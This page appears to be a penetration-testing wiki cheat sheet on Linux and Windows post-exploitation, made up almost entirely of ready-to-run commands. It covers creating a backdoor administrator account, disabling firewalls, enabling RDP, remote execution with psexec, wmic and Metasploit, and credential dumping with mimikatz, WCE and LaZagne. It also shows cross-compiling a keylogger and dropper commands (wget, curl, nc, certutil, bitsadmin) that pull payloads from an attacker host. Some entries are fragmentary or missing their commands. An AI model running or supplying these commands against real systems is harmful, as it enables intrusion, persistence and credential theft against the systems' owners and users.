Intro to Post Exploitation

Penetration Testing Wiki

Linux Post-exploitation

  • Check wrong permissions:

Find setuid binaries:

find / -perm -4000 -ls 2> /dev/null

Find files world writable:

find / -path /sys -prune -o -path /proc -prune -o -type f -perm -o=w -ls 2> /dev/null

Find directories world writable:

find / -path /sys -prune -o -path /proc -prune -o -type d -perm -o=w -ls 2> /dev/null

Look for interesting files:

find / -name "*.txt" -ls 2> /dev/null
find / -name "*.log" -ls 2> /dev/null

Check sudo:

sudo su
sudo -l

Decrypt PKCS#12 objects:

openssl pkcs12 -info -in $FILE

Show certs in PKCS#7 file:

openssl pkcs7 -print_certs -inform DER -in $FILE
openssl smime -verify -in signed.p7 -inform pem
openssl smime -verify -in signed.p7 -inform der

Show keystore content:

keytool -list -v -keystore keystore.jks
  • Commands for information gathering:
ps -ef
/sbin/ifconfig -a
route -n
cat /etc/crontab
ls -la /var/spool/cron*/
ls -la /etc/cron.d
cat /etc/exports
cat /etc/redhat* /etc/debian* /etc/*release
netstat -tanu

Find users with shell access:

egrep -e '/bin/(ba)?sh' /etc/passwd

Check bootup services:

ls /etc/rc*

SSH relationships and logins:

cat ~/.ssh/*



Windows Post-exploitation

Check filesystem:

Like “ls -la” in Linux:

dir /A:H
dir /s /b C:\ | findstr /E ".txt" > txt.txt
dir /s /b C:\ | findstr /E ".log" > log.txt
dir /s /b C:\ | findstr /E ".doc" > doc.txt
dir /s /b C:\ | findstr /E ".xls" > xls.txt
dir /s /b C:\ | findstr /E ".xml" > xml.txt

Compute MD5 hash:

Get-FileHash -Algorithm MD5 -Path .\$FILE

Check registry:

reg query HKLM /f password /t REG_SZ /s > hklm_password.txt
reg query HKCU /f password /t REG_SZ /s > hkcu_password.txt
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated > reg_always.txt
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated >> reg_always.txt

Check scheduler:

schtasks /query /fo LIST /v > schtasks.txt
tasklist /SVC > tasklist.txt

Other checks:

wmic os where Primary='TRUE' reboot

List hotfixes:

wmic qfe
notepad myfile.txt:lion.txt
quser > rdp.txt
netstat -an > netstat.txt
netsh firewall show config > firewall.txt
icacls service.exe
type C:\Windows\System32\drivers\etc\hosts

Wmic commands:

wmic service get name,displayname,pathname,startmode > wmic_service.txt
wmic /node:'' qfe GET description,FixComments,hotfixid,installedby,installedon,servicepackineffect
wmic /node:"" product get name,version,vendor
wmic process get Caption,CommandLine
wmic printer list status
wmic cpu get

List SIDs of the system (as admin):

wmic useraccount get name,sid,fullname

Net commands:

net view
net view \\host
net share
net use z: \\host\dir
net users
net user %username%
net config rdr

Backdoor account:

net user hax0r hax0r /add
net localgroup administrators hax0r /add
net localgroup "Remote Desktop users" hax0r /add

Check routing/network information:

route print
arp -A
ipconfig /all

Show files attributes / permissions

cacls cmd.exe
attrib cmd.exe

List services:

sc queryex type=service state=all
net start

Other info:


Idem for Win XP:

  • Firewall
netsh firewall show stat
netsh firewall show config
netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes
netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000
netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080
netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079

Disable firewall:

netsh advfirewall set currentprofile state off
netsh advfirewall set allprofiles state off
  • RDP

Show RDP sessions:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service type=remotedesktop mode=enable
net start termservice
net start "Terminal Services"
svchost.exe -k termsvcs
tasklist /svc /S servername/U username /P password

Change RDP daemon status from Meterpreter (more Meterpreter commands in Metasploit Meterpreter Cheat Sheet)

msf> reg queryval -k "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" -v TSEnabled
msf> reg setval -k "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" -v TSEnabled -d 1

Change RDP port:

\HKLM\System\CurrentControlSet\Control\Terminal Server\WinStationRDP-TCP Value : PortNUmber REG_DWORD=3389

Remote Execution commands:

wmis -U DOMAIN\$USER%$PASS //$DC cmd.exe /c $COMMAND
wmic /node:$IP /user:administrator /password:$PASSWORD bios get serialnumber
tasklist.exe /S $IP /U domain\username
tasklist.exe /S $IP /U domain\username /FI "USERNAME eq NT AUTHORITY\SYSTEM" /FI "STATUS eq running"
taskkill.exe /S $IP /U domain\username /F /FI "norton"
quser /SERVER:$IP

From sysinternals psexec:

psexec -accepteula \\$IP -u DOMAIN\USER cmd.exe
psexec \\$IP -s cmd /c copy \\server\share\file.ext c:\Temp
psexec -s \\$IP c:\windows\system32\cscript.exe script.vbs arg1

Copy a file to the target host AND execute it:

psexec -accepteula \\$IP -u DOMAIN\USER -c file.exe -w C:\temp

Authenticated WMI Exec via Powershell

msf > use exploit/windows/local/ps_wmi_exec
msf exploit(windows/local/ps_wmi_exec) > show options

Module options (exploit/windows/local/ps_wmi_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DOMAIN                     no        Domain or machine name
   PASSWORD                   no        Password to authenticate with
   RHOSTS                     no        Target address range or CIDR identifier
   SESSION                    yes       The session to run this module on.
   USERNAME                   no        Username to authenticate as

Exploit target:

   Id  Name
   --  ----
   0   Universal

msf exploit(windows/local/ps_wmi_exec) >

In the same host but with other role:

runas /user:administrator cmd
runas /noprofile /user:DOMAIN\administrator cmd
runas /profile /env /user:DOMAIN\$USER "%windir%\system32\script.bat"

Windows exploit suggester (OBSOLETE)

WARNING: As of March 14 2017 no longer supported (

python --update
python --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt

Tools for information gathering

Manual method

dir %TMP% %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent
dir %USERPROFILE%\Favorites
type C:\Windows\System32\drivers\etc\hosts


Download LaZagne from

laZagne.exe all
laZagne.exe browsers
laZagne.exe browsers -firefox

RATs (Remote Administration Tools)

  • Pupy opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python


Sniffers for Windows

Install Wireshark, also use in console dumpcap:

dumpcap -D
dumpcap -i $IFACE

Keyloggers for Windows

Windows keylogger (no admin rights):

To cross-compile it for Windows:

i686-w64-mingw32-g++ klog_main.cpp -o klog -static

Network sniffers for Linux

tcpdump -X -s 0 -i $INTERFACE

Password dumping


mimikatz> privilege::debug
mimikatz> sekurlsa::logonPasswords
mimikatz> sekurlsa::msv


Dumps hashes (needs SYSTEM privileges)


WCE (Windows Credential Editor)

Dumps clear passwords:

wce -w

Dumps hashes:


Persistent, writes in credentials.txt:

wce -r

Change your credentials in memory:

wce -s


Droppers are programs that allows you to download tools, trojans, etc to the target machine to follow the compromise locally.

Droppers using Linux

wget http://$IP/file
curl -k https://$IP/file > file
nc -nvv $IP 8080 > file
scp $FILE [email protected]$IP:~

Droppers using Windows


curl -Uri $URL

See also Powercat in the Powershell frameworks section.




Direct Transfer:

bitsadmin /transfer myDownloadJob /download /priority normal http://$IP/$FILE c:\$FILE

Using a download queue:

bitsadmin /create myDownloadJob
bitsadmin /addfile myDownloadJob http://$IP/$FILE c:\$FILE


certutil.exe -urlcache -split -f "https://$IP/files/netcat.exe" nc.exe


notepad.exe http://$IP/file.txt

Living Off the Land (LOLbins) for Windows



hh.exe C:\windows\system32\calc.exe

C# compiler built-in command:


Droppers Using known protocols



python -m SimpleHTTPServer
python -m SimpleHTTPServer 80


python3 -m http.server 8080


php -S localhost:8000


ruby -run -e httpd . -p 8000


pip install pyftpdlib
python -m pyftpdlib


impacket-smbserver PAYLOADS /root/payload

As part of the post-exploitation part we can also perform Data Exfiltration.